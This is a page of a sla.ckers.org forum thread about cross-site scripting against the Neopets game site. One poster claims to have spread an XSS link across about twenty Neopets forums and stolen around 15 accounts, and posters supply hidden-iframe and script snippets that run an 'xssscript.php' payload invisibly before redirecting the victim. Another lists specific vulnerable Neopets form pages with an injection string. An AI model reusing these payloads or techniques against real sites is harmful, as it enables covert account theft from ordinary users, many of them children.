Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: Neopets?
Posted by: ckore
Date: January 19, 2007 05:42AM

A litte hint:
Don't use style="width:0px;height:0px;border:0px;" only, because if the page has something like this in it's CSS:
iframe {
padding:100px;
}
then the following code or text after the iframe will have a large space between itself and the text before the iframe.
style="display:none" works fine and is more than enough ;)

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 19, 2007 11:54AM

ckore Wrote:
-------------------------------------------------------
> A litte hint:
> Don't use style="width:0px;height:0px;border:0px;"
> only, because if the page has something like this
> in it's CSS:
>
> iframe {
> padding:100px;
> }
> then the following code or text after the iframe
> will have a large space between itself and the
> text before the iframe.
> style="display:none" works fine and is more than
> enough ;)


Well if you're creating the page yourself like the idea was then that isn't really an issue.



Edited 1 time(s). Last edit at 01/19/2007 12:24PM by hasse.

Options: ReplyQuote
Re: Neopets?
Posted by: mutantsrus
Date: October 01, 2007 10:03PM

I found an xss vuln in the scratchcards! Go here to get the link:

http://www.mutantsrus.com/neopets.html

Options: ReplyQuote
Re: Neopets?
Posted by: Spyware
Date: October 02, 2007 06:43AM

Heh, try fishing in the right river. They won't bite here.

Options: ReplyQuote
Re: Neopets?
Posted by: mutantsrus
Date: October 02, 2007 09:46PM

...That would be why I posted that on like twenty neopets related forums... the results are rather interesting. I've gotten about 15 accounts so far.

Options: ReplyQuote
Re: Neopets?
Posted by: mutantsrus
Date: October 04, 2007 06:46AM

Quote
----------
Ohhh how cool, thanks!

Quick question, one...do you have aim or msn?

two...

I'm trying to do

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
location.href="http://www.google.com"
</script>

So it does the xss script and then goes to google...but it seems like it just goes to google and forgets about the iframe. When I remove the google redirection it works though so I'm confused :P
----------------------------------

Just use script tags.
<script>document.write('<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>')</script>
<script>
location.href="http://www.google.com"
</script>


That should do the trick

Options: ReplyQuote
Re: Neopets?
Posted by: fragge
Date: April 09, 2008 05:56PM

why did you guys help this kid.. he has no clue how to code, and just copied and pasted your replies. this is where gareth's codetcha comes in handy..... (btw replying to this due to current post on neopets.. god i haven't seen that "game" in over 8-9 years. can't believe it's still going strong)

Options: ReplyQuote
Re: Neopets?
Date: April 09, 2008 08:04PM

I never took part in such faggotry, but it's no longer simply a game, fragge. They've expanded their empire, and now have commercials on television, digital pocket games, and stuffed creatures for sale.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Neopets?
Posted by: fragge
Date: April 09, 2008 09:46PM

ugh, almost as sickening as apple's line of consumer products.

Options: ReplyQuote
Re: Neopets?
Posted by: nemessis
Date: April 11, 2008 05:58AM

Tested with IE6 and Firefox

Go to http://arcade.neopets.com/tellafriend.php and put "><script>alert(1)</script> in the name form.

Another one is located here http://arcade.neopets.com/contact.php

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine

Options: ReplyQuote
Re: Neopets?
Posted by: ExtraBB
Date: February 15, 2010 10:54AM

Is neopets still vulnerable?

Options: ReplyQuote
Re: Neopets?
Posted by: id
Date: February 15, 2010 10:44PM

I'll cut you

-id

Options: ReplyQuote
Re: Neopets?
Posted by: PaPPy
Date: February 16, 2010 07:22AM

rofl, that made my day

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 02/16/2010 07:23AM by PaPPy.

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.